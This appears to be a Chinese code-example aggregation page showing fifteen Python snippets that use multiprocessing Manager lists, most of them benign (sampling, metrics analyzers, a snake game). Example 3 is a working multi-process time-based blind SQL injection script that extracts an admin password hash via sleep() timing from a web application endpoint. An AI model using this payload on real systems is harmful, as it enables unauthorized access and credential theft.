当前位置: 首页>>代码示例>>Python>>正文


Python Manager.append方法代码示例

本文整理汇总了Python中multiprocessing.Manager.append方法的典型用法代码示例。如果您正苦于以下问题:Python Manager.append方法的具体用法?Python Manager.append怎么用?Python Manager.append使用的例子?那么恭喜您, 这里精选的方法代码示例或许可以为您提供帮助。您也可以进一步了解该方法所在multiprocessing.Manager的用法示例。


在下文中一共展示了Manager.append方法的15个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于系统推荐出更棒的Python代码示例。

示例1: sampleWithDistInfo_boundStrat_multiThread

# 需要导入模块: from multiprocessing import Manager [as 别名]
# 或者: from multiprocessing.Manager import append [as 别名]
    def sampleWithDistInfo_boundStrat_multiThread(self, num):
        """Randomly sample one configuration in the c-space first. (Get a sphere)
        Then add the sphere to result set.
        repeat:
	        sample the boundary of spheres set.
	        add new sphere to the set
        until 

        @param num: Total number of spheres as a terminate condition.                     ###################### TODO: find a terminate condition that can be used to evaluate sphere coverage
        """
        try:
            #self.mDistSamples = Manager().list();
            self.g_failTimes.value = 0;
            boundaryQueue = multiprocessing.Queue();
            dictProxy = Manager().list()
            dictProxy.append({});

            threads = [];
            threadsCount = 1;
            for i in range(0,threadsCount):
                newThread = Process( target=self.__mltithreadDistSample_boundStrat__, args=[ i, dictProxy, boundaryQueue,num ] );
                threads += [newThread];
            for i in range( 0,threadsCount ):
                threads[i].start();
            for i in range( 0,threadsCount ):
                threads[i].join();

            print "Get {0} samples".format( len(self.mDistSamples) );

        except Exception, msg:
            print "Failed to start a thread, MSG:\n\t" + str(msg);
            self.g_failTimes.value = 0;
开发者ID:IanZhang1990,项目名称:Robotics-MotionPlanning,代码行数:34,代码来源:SampleManager_old.py

示例2: __init__

# 需要导入模块: from multiprocessing import Manager [as 别名]
# 或者: from multiprocessing.Manager import append [as 别名]
class MemStorage:
    def __init__(self, config):
        self.config = config
        self.measures = Manager().list()

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        pass

    def save(self, measure):
        self.measures.append(measure)

    def last(self):
        if len(self.measures) <= 0:
            return None

        return self.measures[-1]

    def __str__(self):
        buf = "<{} measures: [".format(self.__class__)
        for item in self.measures:
            buf += "'{}'".format(item)
        buf += "]>"

        return buf
开发者ID:skoenen,项目名称:pyprol,代码行数:29,代码来源:fixture.py

示例3: GuessPassword

# 需要导入模块: from multiprocessing import Manager [as 别名]
# 或者: from multiprocessing.Manager import append [as 别名]
class GuessPassword(object):
    def __init__(self, passwd_length, processes=6, timeout=3):
        self.result = Manager().dict()
        self.stop_flag = Manager().list()
        self.worker_list = []
        self.processes = processes
        self.timeout = timeout
        self.queue = Queue()
        self.lock = RLock()
        self.cookie = {'_SERVER': ''}
        self.passwd_length = passwd_length
        self.url = "http://localhost/general/document/index.php/send/approve/finish"
        self.payload = "1) and char(@`'`)  union select if(ord(mid(PASSWORD,{position},1))={guess_char},sleep(4),1),1 from user WHERE BYNAME = 0x61646d696e #and char(@`'`)"

        self.stop_flag.append(False)  # 这里不能写成 self.stop_flag[0] = False, 否则会提示 indexOutRange
        for _ in range(1, self.passwd_length):
            self.queue.put(_)

    def exploit(self):
        while not self.queue.empty() and not self.stop_flag[0]:
            passwd_position = self.queue.get()
            for _guess_char in range(33, 128):
                payload = self.payload.format(position=passwd_position, guess_char=_guess_char)
                exp_data = {'sid': payload}
                try:
                    res = requests.post(self.url, data=exp_data, cookies=self.cookie, timeout=self.timeout)
                except requests.ReadTimeout:
                    self.lock.acquire()
                    self.result[passwd_position] = chr(_guess_char)
                    print "Data %dth: %s" % (passwd_position, self.result[passwd_position])
                    self.lock.release()
                    break

    def run(self):

        for _ in range(self.processes):
            _worker = Process(target=self.exploit)
            # _worker.daemon = True
            _worker.start()

        try:
            while len(
                    multiprocessing.active_children()) > 2:  # 为什么不是大于0呢, 当所有工作子进程都结束之后,还有两个子进程在运行,那就是两个Manager 子进程(用于多进程共享数据);multiprocessing.active_children() 返回的是当前活动进程对象的list
                # self.lock.acquire()
                # print len(multiprocessing.active_children())
                # self.lock.release()
                time.sleep(1)
        except KeyboardInterrupt:
            self.lock.acquire()
            print 'wait for all subprocess stop......'
            self.stop_flag[0] = True
            self.lock.release()

        else:
            print self.result
            print 'finish'
开发者ID:Arryboom,项目名称:x386,代码行数:58,代码来源:Multiprocess_Brute.py

示例4: JobManager

# 需要导入模块: from multiprocessing import Manager [as 别名]
# 或者: from multiprocessing.Manager import append [as 别名]
class JobManager(threading.Thread):
    def __init__(self, num_workers, worker_name):
        threading.Thread.__init__(self, name=worker_name)

        self.pool = Pool(num_workers=num_workers, name=worker_name)

        if os.name == 'nt':
            self.in_progress_jobs = []
            self.lock = threading.RLock()
        else:
            self.in_progress_jobs = Manager().list()
            self.lock = Manager().Lock()

    def run(self):
        while 1:
            try:
                time.sleep(20)
                self.dispatch()
            except Exception:
                # Print to debug console instead of to DB.
                import traceback
                print(traceback.format_exc())

    def dispatch(self):
        raise NotImplementedError("Children must override dispatch()")

    def submit_job(self, work_unit):
        with self.lock:
            if work_unit.get_unique_key() in self.in_progress_jobs:
                return False

            self.in_progress_jobs.append(work_unit.get_unique_key())

        # Remember these shared memory references
        work_unit.in_progress_jobs = self.in_progress_jobs
        work_unit.lock = self.lock

        self.pool.submit(work_unit)

        return True
开发者ID:anushreejangid,项目名称:csm,代码行数:42,代码来源:job_manager.py

示例5: Analyzer

# 需要导入模块: from multiprocessing import Manager [as 别名]
# 或者: from multiprocessing.Manager import append [as 别名]
class Analyzer(Thread):
    def __init__(self, parent_pid):
        """
        Initialize the Analyzer
        """
        super(Analyzer, self).__init__()
        self.redis_conn = StrictRedis(unix_socket_path = settings.REDIS_SOCKET_PATH)
        self.daemon = True
        self.parent_pid = parent_pid
        self.current_pid = getpid()
        self.anomalous_metrics = Manager().list()
        self.exceptions_q = Queue()
        self.anomaly_breakdown_q = Queue()

    def check_if_parent_is_alive(self):
        """
        Self explanatory
        """
        try:
            kill(self.current_pid, 0)
            kill(self.parent_pid, 0)
        except:
            exit(0)

    def send_graphite_metric(self, name, value):
        if settings.GRAPHITE_HOST != '':
            sock = socket.socket()
            sock.connect((settings.CARBON_HOST.replace('http://', ''), settings.CARBON_PORT))
            sock.sendall('%s %s %i\n' % (name, value, time()))
            sock.close()
            return True

        return False

    def spin_process(self, i, unique_metrics):
        """
        Assign a bunch of metrics for a process to analyze.
        """
        # Discover assigned metrics
        keys_per_processor = int(ceil(float(len(unique_metrics)) / float(settings.ANALYZER_PROCESSES)))
        if i == settings.ANALYZER_PROCESSES:
            assigned_max = len(unique_metrics)
        else:
            assigned_max = i * keys_per_processor
        assigned_min = assigned_max - keys_per_processor
        assigned_keys = range(assigned_min, assigned_max)

        # Compile assigned metrics
        assigned_metrics = [unique_metrics[index] for index in assigned_keys]

        # Check if this process is unnecessary
        if len(assigned_metrics) == 0:
            return

        # Multi get series
        raw_assigned = self.redis_conn.mget(assigned_metrics)

        # Make process-specific dicts
        exceptions = defaultdict(int)
        anomaly_breakdown = defaultdict(int)

        # Distill timeseries strings into lists
        for i, metric_name in enumerate(assigned_metrics):
            self.check_if_parent_is_alive()

            try:
                raw_series = raw_assigned[i]
                unpacker = Unpacker(use_list = False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)

                anomalous, ensemble, datapoint = run_selected_algorithm(timeseries, metric_name)

                # If it's anomalous, add it to list
                if anomalous:
                    base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1)
                    metric = [datapoint, base_name]
                    self.anomalous_metrics.append(metric)

                    # Get the anomaly breakdown - who returned True?
                    for index, value in enumerate(ensemble):
                        if value:
                            algorithm = settings.ALGORITHMS[index]
                            anomaly_breakdown[algorithm] += 1

            # It could have been deleted by the Roomba
            except TypeError:
                exceptions['DeletedByRoomba'] += 1
            except TooShort:
                exceptions['TooShort'] += 1
            except Stale:
                exceptions['Stale'] += 1
            except Boring:
                exceptions['Boring'] += 1
            except:
                exceptions['Other'] += 1
                logger.info(traceback.format_exc())

        # Add values to the queue so the parent process can collate
        for key, value in anomaly_breakdown.items():
#.........这里部分代码省略.........
开发者ID:jxwr,项目名称:skyline,代码行数:103,代码来源:analyzer.py

示例6: Boundary

# 需要导入模块: from multiprocessing import Manager [as 别名]
# 或者: from multiprocessing.Manager import append [as 别名]
class Boundary(Thread):
    def __init__(self, parent_pid):
        """
        Initialize the Boundary
        """
        super(Boundary, self).__init__()
        self.redis_conn = StrictRedis(unix_socket_path=REDIS_SOCKET)
        self.daemon = True
        self.parent_pid = parent_pid
        self.current_pid = getpid()
        self.boundary_metrics = Manager().list()
        self.anomalous_metrics = Manager().list()
        self.exceptions_q = Queue()
        self.anomaly_breakdown_q = Queue()

    def check_if_parent_is_alive(self):
        """
        Self explanatory
        """
        try:
            kill(self.current_pid, 0)
            kill(self.parent_pid, 0)
        except:
            exit(0)

    def send_graphite_metric(self, name, value):
        if settings.GRAPHITE_HOST != '':
            sock = socket.socket()

            try:
                sock.connect((settings.GRAPHITE_HOST, settings.CARBON_PORT))
            except socket.error:
                endpoint = '%s:%d' % (settings.GRAPHITE_HOST,
                                      settings.CARBON_PORT)
                logger.error('Cannot connect to Graphite at %s' % endpoint)
                return False

            sock.sendall('%s %s %i\n' % (name, value, time()))
            sock.close()
            return True

        return False

    def unique_noHash(self, seq):
        seen = set()
        return [x for x in seq if str(x) not in seen and not seen.add(str(x))]

    # This is to make a dump directory in /tmp if ENABLE_BOUNDARY_DEBUG is True
    # for dumping the metric timeseries data into for debugging purposes
    def mkdir_p(self, path):
        try:
            os.makedirs(path)
            return True
        except OSError as exc:
            # Python >2.5
            if exc.errno == errno.EEXIST and os.path.isdir(path):
                pass
            else:
                raise

    def spin_process(self, i, boundary_metrics):
        """
        Assign a bunch of metrics for a process to analyze.
        """
        # Determine assigned metrics
        bp = settings.BOUNDARY_PROCESSES
        bm_range = len(boundary_metrics)
        keys_per_processor = int(ceil(float(bm_range) / float(bp)))
        if i == settings.BOUNDARY_PROCESSES:
            assigned_max = len(boundary_metrics)
        else:
            # This is a skyine bug, the original skyline code uses 1 as the
            # beginning position of the index, python indices begin with 0
            # assigned_max = len(boundary_metrics)
            # This closes the etsy/skyline pull request opened by @languitar on 17 Jun 2014
            # https://github.com/etsy/skyline/pull/94 Fix analyzer worker metric assignment
            assigned_max = min(len(boundary_metrics), i * keys_per_processor)
        assigned_min = (i - 1) * keys_per_processor
        assigned_keys = range(assigned_min, assigned_max)

        # Compile assigned metrics
        assigned_metrics_and_algos = [boundary_metrics[index] for index in assigned_keys]
        if ENABLE_BOUNDARY_DEBUG:
            logger.info('debug - printing assigned_metrics_and_algos')
            for assigned_metric_and_algo in assigned_metrics_and_algos:
                logger.info('debug - assigned_metric_and_algo - %s' % str(assigned_metric_and_algo))

        # Compile assigned metrics
        assigned_metrics = []
        for i in assigned_metrics_and_algos:
            assigned_metrics.append(i[0])

        # unique unhashed things
        def unique_noHash(seq):
            seen = set()
            return [x for x in seq if str(x) not in seen and not seen.add(str(x))]

        unique_assigned_metrics = unique_noHash(assigned_metrics)

        if ENABLE_BOUNDARY_DEBUG:
#.........这里部分代码省略.........
开发者ID:gaos1,项目名称:skyline,代码行数:103,代码来源:boundary.py

示例7: print

# 需要导入模块: from multiprocessing import Manager [as 别名]
# 或者: from multiprocessing.Manager import append [as 别名]
    print()
    system('setterm -cursor on') # Réafficher le curseur si on fait CTRL+C
    exit(0)



snake_list = []
snake_direction = Manager().Value('ctypes.c_char_p', "right")   ## Variable partagée avec l'autre processus
snake_blocks = Manager().Value('i', 2)
game_speed = Manager().Value('f', .5)

posLargSnake = Manager().Value('i', 1)
posLongSnake = Manager().Value('i', 1)

snake_head = Manager().list()
snake_head.append(1)
snake_head.append(2)

point_pos = Manager().list()
score = Manager().Value('i', 0)
game_over = Manager().Value('b', False)
pause = Manager().Value('b', False)
printed_pause = Manager().Value('b', True)
touche = Manager().Value('i', 0)

colored_space = Manager().Value('ctypes.c_char_p', colored(' ', 'grey', 'on_grey'))
colored_snake_body = Manager().Value('ctypes.c_char_p', colored('x', 'green', 'on_green'))
colored_snake_head = Manager().Value('ctypes.c_char_p', colored('x', 'white', 'on_white'))
colored_point = Manager().Value('ctypes.c_char_p', colored('o', 'red', 'on_red'))

signal.signal(signal.SIGINT, quit)
开发者ID:roscale,项目名称:snake,代码行数:33,代码来源:snake.py

示例8: Worker

# 需要导入模块: from multiprocessing import Manager [as 别名]
# 或者: from multiprocessing.Manager import append [as 别名]
class Worker(object):

    def __init__(self, fname, output_file):
        self.fname = fname
        self.split_files = None
        '''
        self.db_instance = Utility.tinydb_instance()
        '''
        self.undefined_list = Manager().list()
        self.defined_list = Manager().list()
        self.lines_to_be = 0
        self.output = {}
        self.opfile = output_file

    def data_process(self):
        """
        This method is to process the data. It will calculate the line count in file
        and split file based on line count. Now files are split to the number based on
        number of cores in machine.
        returns :Nothing
        """
        logging.info('Processing the data and split files')
        lines = Utility.file_len(self.fname)
        self.lines_to_be, self.split_files = Utility.split_files(self.fname, lines,
                                                                 cpu_count().real)

    def clean_json(self, line_no, row):
        """
        This method is for initial cleaning to reduce overhead from parser.
         Length of the Each line should be either 4 or 5 comma seperated
        :param line_no:  Line number from the file
        :param row: the document to process
        :return: Boolean
        """
        if len(row) not in [4, 5]:
            return False
        return True

    def parse_json(self, fname):
        """
        This is the core function. It will call ParseDoc object and parse each document
        The output is written to a shared memory list.
        :param fname:
        :return: Nothing
        """
        dp = DocProcess(fname, self.lines_to_be)
        dp.read_csv()
        parser_doc = ParseDoc()
        for line_no, row in dp.next():
            row_list = row.split(',')
            if self.clean_json(line_no, row_list):
                value = parser_doc.parse_machine(row_list)
                if value:
                    self.defined_list.append(value)
                else:
                    self.undefined_list.append(line_no)
            else:
                self.undefined_list.append(line_no)

    def mapper(self):
        workers = []
        for s_file in self.split_files:
            worker_process = Process(target=self.parse_json, args=(s_file, ))
            workers.append(worker_process)
            worker_process.start()

        [worker.join() for worker in workers]

    def reducer(self):
        self.output["entries"] = list(self.defined_list)
        self.output["errors"] = list(self.undefined_list)

        self.output["errors"].sort()
        new_list = sorted(self.output["entries"], key=itemgetter('lastname'))
        self.output["entries"] = new_list

        with open(self.opfile, 'w') as f:
            pprint.pprint(self.output, f, indent=2)

    def run(self):
        self.mapper()
        self.reducer()
开发者ID:sandipnd,项目名称:Algorithms,代码行数:84,代码来源:worker.py

示例9: Mirage

# 需要导入模块: from multiprocessing import Manager [as 别名]
# 或者: from multiprocessing.Manager import append [as 别名]
class Mirage(Thread):
    def __init__(self, parent_pid):
        """
        Initialize the Mirage
        """
        super(Mirage, self).__init__()
        self.daemon = True
        self.parent_pid = parent_pid
        self.current_pid = getpid()
        self.anomalous_metrics = Manager().list()
        self.mirage_exceptions_q = Queue()
        self.mirage_anomaly_breakdown_q = Queue()
        self.not_anomalous_metrics = Manager().list()
        self.metric_variables = Manager().list()

    def check_if_parent_is_alive(self):
        """
        Self explanatory
        """
        try:
            kill(self.current_pid, 0)
            kill(self.parent_pid, 0)
        except:
            exit(0)

    def mkdir_p(self, path):
        try:
            os.makedirs(path)
            return True
        # Python >2.5
        except OSError as exc:
            if exc.errno == errno.EEXIST and os.path.isdir(path):
                pass
            else:
                raise

    def surface_graphite_metric_data(self, metric_name, graphite_from, graphite_until):
        # We use absolute time so that if there is a lag in mirage the correct
        # timeseries data is still surfaced relevant to the anomalous datapoint
        # timestamp
        if settings.GRAPHITE_PORT != '':
            url = '%s://%s:%s/render/?from=%s&until=%s&target=%s&format=json' % (
                settings.GRAPHITE_PROTOCOL, settings.GRAPHITE_HOST,
                str(settings.GRAPHITE_PORT), graphite_from, graphite_until,
                metric_name)
        else:
            url = '%s://%s/render/?from=%s&until=%s&target=%s&format=json' % (
                settings.GRAPHITE_PROTOCOL, settings.GRAPHITE_HOST,
                graphite_from, graphite_until, metric_name)
        r = requests.get(url)
        js = r.json()
        datapoints = js[0]['datapoints']

        converted = []
        for datapoint in datapoints:
            try:
                new_datapoint = [float(datapoint[1]), float(datapoint[0])]
                converted.append(new_datapoint)
            except:
                continue

        parsed = urlparse.urlparse(url)
        target = urlparse.parse_qs(parsed.query)['target'][0]

        metric_data_folder = settings.MIRAGE_DATA_FOLDER + "/" + target
        self.mkdir_p(metric_data_folder)
        with open(metric_data_folder + "/" + target + '.json', 'w') as f:
            f.write(json.dumps(converted))
            f.close()
            return True

        return False

    def load_metric_vars(self, filename):
        if os.path.isfile(filename) == True:
            f = open(filename)
            global metric_vars
            metric_vars = imp.load_source('metric_vars', '', f)
            f.close()
            return True

        return False

    def spin_process(self, i, run_timestamp):
        """
        Assign a metric for a process to analyze.
        """

        # Discover metric to analyze
        metric_var_files = [f for f in listdir(settings.MIRAGE_CHECK_PATH) if isfile(join(settings.MIRAGE_CHECK_PATH, f))]

        # Check if this process is unnecessary
        if len(metric_var_files) == 0:
            return

        metric_var_files_sorted = sorted(metric_var_files)
        metric_check_file = '%s/%s' % (
            settings.MIRAGE_CHECK_PATH, str(metric_var_files_sorted[0]))

        # Load metric variables
#.........这里部分代码省略.........
开发者ID:blak3r2,项目名称:skyline,代码行数:103,代码来源:mirage.py

示例10: __init__

# 需要导入模块: from multiprocessing import Manager [as 别名]
# 或者: from multiprocessing.Manager import append [as 别名]

#.........这里部分代码省略.........
            for sample in self.mDistSamples:
                if sample.isInside( (rnd1, rnd2), self.mCSpace.mScaledWidth, self.mCSpace.mScaledHeight ):
                    newSamp = False;
                    failTime += 1
                    break;
            if newSamp:
                # randomly shoot rays to get the nearest distance to obstacles
                rayShooter = RayShooter( rnd1, rnd2, self.mCollisionMgr, self.mCSpace );
                dist = rayShooter.randShoot(72);
                if math.fabs(dist) >= 1.0:
                    newDistSamp = DistSample(rnd1, rnd2, dist);
                    #(self.mDistSamples).append( newDistSamp );
                    print "failed times: {0}".format( failTime );
                    failTime=0;
                    return newDistSamp;
                else:
                    failTime += 1;

        return None;

    ###=======================================================================================
    ###=== Strategy 2: Randomly sample one sphere, then sample from the boundary
    ###===         Then keep sampling the new boundary of the set of spheres
    def distSampleOneThread( self, num, imgSurface=None ):
        self.mDistSamples = [];
        boundaryQueue = Queue();
        bndSphDict = defaultdict();

        randFreeSamp = 1234;
        while( randFreeSamp != None ):
            randFreeSamp = self.getARandomFreeSample( num );
            if( randFreeSamp == None ):
                return;
            self.mDistSamples.append( randFreeSamp );
            self.drawDistSample(imgSurface, (randFreeSamp.mSample[0],randFreeSamp.mSample[1]), randFreeSamp.mRadius);
            bounds = randFreeSamp.getBoundaryConfigs(self.mCSpace.mScaledWidth, self.mCSpace.mScaledHeight);

            for bndConfig in bounds:
                #if not bndConfig in bndSphDict:				# put the boundconfig-sphere relation to the dictionary
                bndSphDict[bndConfig] = randFreeSamp;
                boundaryQueue.put( bndConfig );				# put the boundary config to the queue.

            while( not boundaryQueue.empty() ):
                #print "Size of dist samples {0}".format( len( self.mDistSamples ) );
     #           if( len(self.mDistSamples) % 100 == 0 ):
                    #randFreeSamp = self.getARandomFreeSample( num );
                    #if( randFreeSamp == None ):
                    #	return;
                    #(self.mDistSamples).append( randFreeSamp )
                    #bounds = randFreeSamp.getBoundaryConfigs(self.mCSpace.mScaledWidth, self.mCSpace.mScaledHeight);		# get the boundary configs
                    #for bndConfig in bounds:
                    #	#if not bndConfig in bndSphDict:				# put the boundconfig-sphere relation to the dictionary
                    #	bndSphDict[bndConfig] = newDistSamp;
                    #	boundaryQueue.put( bndConfig );				# put the boundary config to the queue.


                bnd = boundaryQueue.get();							# get a new boundary  
                newSamp = True;
                if self.mCollisionMgr.ifCollide((bnd[0], bnd[1])):
                    continue;
                for sample in self.mDistSamples:
                    if sample.isInside( (bnd[0], bnd[1]), self.mCSpace.mScaledWidth, self.mCSpace.mScaledHeight ): #####################################################################################================================ Locally Sensetive Hash
                        # check if within any spheres, not including the sphere that the boundary config belongs to.
                        newSamp = False;
                        break;
开发者ID:IanZhang1990,项目名称:Robotics-MotionPlanning,代码行数:69,代码来源:SampleManager.py

示例11: SharedData

# 需要导入模块: from multiprocessing import Manager [as 别名]
# 或者: from multiprocessing.Manager import append [as 别名]
class SharedData(object):
    """
    Handles shared statistical data, which we want to collect over several
    executions of the ccdetection tool.
    Only shared values are used, so that multiple child processes 
    can manipulate them.
    """

    KEY_NODES   = "nodes_total"
    KEY_INPATH  = "in_path"
    KEY_CLONES  = "clones"
    KEY_COUNTER = "counter"
    KEY_QUERY_TIME = "query_time_total"
    KEY_FIRST_COUNTER = "first_query_counter"
    KEY_PROJECTS_COUNTER = "projects_counter"
    KEY_FIRST_QUERY_TIME = "first_query_time_total"

    def __init__(self, path, lock, in_path=None):
        """
        Setup all values to be shared (between processes) values.
        """
        self.lock = lock
        self.path = path
        
        if os.path.isfile(path):
            self.loadData()
            
        else:
            self.in_path = in_path
            self.clones = Manager().list()
            self.counter = Value("i", 0)
            self.nodes_total = Value("i", 0)            
            self.first_counter = Value("i", 0)
            self.query_time_total = Value("d", 0)
            self.projects_counter = Value("i", 0)
            self.first_query_time_total = Value("d", 0)
    
    def incProjectsCounter(self):
        """
        Increase the counter of projects analysed.
        """
        self.projects_counter.value += 1
    
    def addQuery(self, query_time, first=False):
        """
        Add the statistical data of a query that did not find a code clone.
        """
        if first:
            self.first_counter.value += 1
            self.first_query_time_total.value += query_time
             
        else:
            self.counter.value += 1
            self.query_time_total.value += query_time
            
    def addFoundCodeClone(self, code_clone_data, first=False):
        """
        Add the statistical data of a query that did find a code clone.
        """
        self.addQuery(code_clone_data.getQueryTime(), first)
        self.clones.append(code_clone_data)
        
    def loadData(self):
        with open(self.path, "rb") as fh:
            data = pickle.load(fh)
            
        # Restore state from load data.
        self.in_path = data[self.KEY_INPATH]
        self.clones  = Manager().list(data[self.KEY_CLONES])
        self.counter = Value("i", data[self.KEY_COUNTER])
        self.nodes_total = Value("i", data[self.KEY_NODES])
        self.first_counter = Value("i", data[self.KEY_FIRST_COUNTER])
        self.query_time_total = Value("d", data[self.KEY_QUERY_TIME])
        self.projects_counter = Value("i", data[self.KEY_PROJECTS_COUNTER])
        self.first_query_time_total = Value("d", data[self.KEY_FIRST_QUERY_TIME])
            
    def saveData(self, queries, code_clones):
        """
        Save the data of an analysed project to file.
        To avoid conflicts of multiple processes adding and saving data
        at the same time, we save all data atomically and using a lock, which
        prevents multiple executions at once.
        """
        self.lock.acquire()
        # Increase projects counter.
        self.incProjectsCounter()    
        
        
        # Add all query data.
        for query_dict in queries:
            self.addQuery(query_dict["query_time"], query_dict["first"])

        # Add all data from found code clones
        for clone_dict in code_clones:
            self.addFoundCodeClone(clone_dict["clone"], clone_dict["first"])
        
        self.saveToFile(self.path)
        
        self.lock.release()

#.........这里部分代码省略.........
开发者ID:tommiu,项目名称:ccdetection,代码行数:103,代码来源:shared_data.py

示例12: KarnaughMap

# 需要导入模块: from multiprocessing import Manager [as 别名]
# 或者: from multiprocessing.Manager import append [as 别名]

#.........这里部分代码省略.........
                    best=self.blocks
                    bestc=len(best)
                    bestsc=sc

                else:

                    if( sc>bestsc ):

                        best=self.blocks
                        bestc=len(best)
                        bestsc=sc




        self.blocks=best


    def Solve2(self, completion):

        def Join(a,i):
            CompBlocks = [block for block in blocks if self.IsJoinable(a.values, block.values )]
            for b in CompBlocks:
                x=self.IsJoinable(a.values, b.values )
                if(x>0):
                    #/* If they can be joined make a new block with 2 in the place
                    #of the one bit where they a and b are different */
                    n = KarnaughNode()
                    n.numberOfItems=a.numberOfItems*2
                    n.flag = False
                    for j in range(0, len(a.values) ):

                        if(j!=(x-1)):
                            n.values.append(a.values[j] )
                        else:
                            n.values.append( 2 )

                    #/* Mark that a node is part of a larger node */
                    a.flag=True
                    b.flag=True

                    #/* Check if that block already exists in the list */
                    exist=False
                    for c in self.blocks:
                        if(n.values==c.values):
                            exist=True

                    if(not exist):
                        self.blocks.append(n )
        def CleanProcess():
            for process in ProcessList:
                process.join()

            for process in ProcessList:
                jn = resultQueue.get()
                for n in jn.newblocks:
                    exist = False
                    for c in self.blocks:
                        if(n.values==c.values):
                            exist=True
                    if(not exist):
                        self.blocks.append(n )
                for b in jn.removeblocks:
                    for c in self.blocks:
                        if(b.values==c.values):
                            self.blocks.remove(c)
开发者ID:trilomix,项目名称:kmappy,代码行数:70,代码来源:karnaughmap.py

示例13: __init__

# 需要导入模块: from multiprocessing import Manager [as 别名]
# 或者: from multiprocessing.Manager import append [as 别名]
class SampleManager:
    def __init__( self, CSpace ):
        self.mCSpace = CSpace;
        self.mCollisionMgr = CSpace.mCollisionMgr;
        self.mDistSamples = Manager().list();
        self.mFreeSamples = [];
        self.mObstSamples = [];
        self.g_failTimes = Value( 'i', 0 );
        unitLens = [100] * len( self.mCSpace.mMaxDimLens )
        self.mSpacePartition = SpacePartition( self.mCSpace.mMaxDimLens, unitLens );

    def getFreeSamples( self, num, dim, maxDimLens ):
        """get num number of free samples in C-Space"""
        size = 0; 
        while size < num:
            rnd = [0] * dim;
            for i in range( 0, dim ):
                rnd[i] = randrange( 0, maxDimLens[i] );
                pass
            #angles = self.mCSpace.map2UnscaledSpace( rnd );
            if( not self.mCollisionMgr.ifCollide( rnd ) ):
                self.mFreeSamples.append( rnd );
                size += 1;

    def randomSample( self, num, dim, maxDimLens ):
        for i in range( 0, num ):
            rnd = [0] * dim;
            for i in range( 0, dim ):
                rnd[i] = randrange( 0, maxDimLens[i] );
                pass
            #config = self.mCSpace.map2UnscaledSpace( rnd );
            if( not self.mCollisionMgr.ifCollide( rnd ) ):
                self.mFreeSamples.append( rnd );
            else:
                self.mObstSamples.append( rnd );
     
    def getARandomFreeSample(self, num, maxDimLens, dim):
        """Randomly sample the space and return a free sample (with distance info).
         The sample is not inside of any other sphere. Also, this method will not automatically 
         add the new sample to self.mDistSamples list.
         @param num: fail time. If failed to find such a sample num times, return null"""
        failTime=0;
        while( failTime < num ):
            rnd = [0] * dim;
            for i in range( 0, dim ):
                rnd[i] = randrange( 0, maxDimLens[i] );
                pass
            #angles = self.mCSpace.map2UnscaledSpace( rnd );
            if( self.mCollisionMgr.ifCollide( rnd ) ):
                continue;

            newSamp = True;

            grid = self.mSpacePartition.getContainingGrid( rnd );
            for sphere in grid.mContainer:
                if sphere.isInside( rnd ):
                    newSamp = False;
                    failTime += 1
                    break;

            if newSamp:
                # randomly shoot rays to get the nearest distance to obstacles
                rayShooter = RayShooter( rnd, self.mCollisionMgr, self.mCSpace );
                dist = rayShooter.randShoot(50 * 2);
                if math.fabs(dist) >= 1.0:
                    newDistSamp = DistSample( rnd, dist );
                    print "------>\tfailed times: {0}".format( failTime );
                    failTime=0;
                    return newDistSamp;
                else:
                    failTime += 1;

        return None;
           

    def distSampleUsingObstSurfSamps( self, num, maxDimLens ):
        """@param num: failure time to sample a new configuration randomly"""

        self.randomSample( 100, len(maxDimLens), maxDimLens );
        searcher = ObstSurfSearcher(self.mCollisionMgr, self.mCSpace);
        searcher.searchObstSurfConfigs( self.mFreeSamples, self.mObstSamples, 2 );

        self.mDistSamples = [];
        boundaryQueue = [];
        bndSphDict = defaultdict();
        randFreeSamp = 1234;

        while( randFreeSamp != None ):
            randFreeSamp = self.getARandomFreeSample( num, maxDimLens, 2);
            if( randFreeSamp == None ):
                return;
            self.mDistSamples.append( randFreeSamp );
            bounds = randFreeSamp.getBoundaryConfigs( maxDimLens );

            for bndConfig in bounds:
                #if not bndConfig in bndSphDict:			# put the boundconfig-sphere relation to the dictionary
                bndSphDict[str(bndConfig)] = randFreeSamp;
                boundaryQueue.append( bndConfig );				# put the boundary config to the queue.

            while( len( boundaryQueue) != 0 ):
#.........这里部分代码省略.........
开发者ID:IanZhang1990,项目名称:Robotics-MotionPlanning,代码行数:103,代码来源:SampleManager2.py

示例14: Queue_server

# 需要导入模块: from multiprocessing import Manager [as 别名]
# 或者: from multiprocessing.Manager import append [as 别名]
class Queue_server(object):
    
    '''
                 初始话公众号队列
     @param Tuple wx_lists 公众号列表
    '''
    def __init__(self ,wx_lists=()):
        self.__queue = Manager().Queue(-1)
        self.init_wx_lists(wx_lists)
        self.__fail_list = Manager().list()
    '''
                 初始话公众号队列
     @param Tuple wx_lists 公众号列表
    '''      
    def init_wx_lists(self ,wx_lists=()):
        for wx in wx_lists:
            self.put(wx)
    '''
                 添加元素
     @param mixed value 要添加的元素
    '''
    def put(self ,value):
        self.__queue.put(value)
    
    '''
                 弹出元素
     @return mixed       
    '''
    def get(self):
        if not self.empty():
            return self.__queue.get()
        return False
    
    '''
                 获取队列
     @return mixed       
    '''
    def get_wx_lists_queue(self):
        return self.__queue
    
    '''
                             获取队列大小
        @return int
    '''
    def get_size(self):
        return self.__queue.qsize()
    
    '''
                             队列是否为空
        @return bool
    '''
    def empty(self):
        return self.__queue.empty()
    
    '''
                             添加失败数据
        @param tuple wx_data 公众号信息
        @return bool
    '''     
    def put_fail_wx(self , wx_data):
        self.__fail_list.append(wx_data)
    
    '''
                             打印失败列表
    '''    
    def print_fail_list(self ,flush=None):
        if len(self.__fail_list) > 0 :
            for fail in self.__fail_list:
                self.put(fail)
                print 'the fail wx : {0}' . format(fail)
            if not flush:
                self.__fail_list = Manager().list()
        elif flush:
            print 'all success'
            
    #判断是否有错
    def is_have_failed(self):
        #判断是否有失败的公众号重新加入队列中
        return not self.empty()
开发者ID:yankaics,项目名称:get_wx_article,代码行数:81,代码来源:queue_server.py

示例15: Analyzer

# 需要导入模块: from multiprocessing import Manager [as 别名]
# 或者: from multiprocessing.Manager import append [as 别名]
class Analyzer(Thread):
    def __init__(self, parent_pid):
        """
        Initialize the Analyzer
        """
        super(Analyzer, self).__init__()
        self.redis_conn = StrictRedis(unix_socket_path = settings.REDIS_SOCKET_PATH)
        self.daemon = True
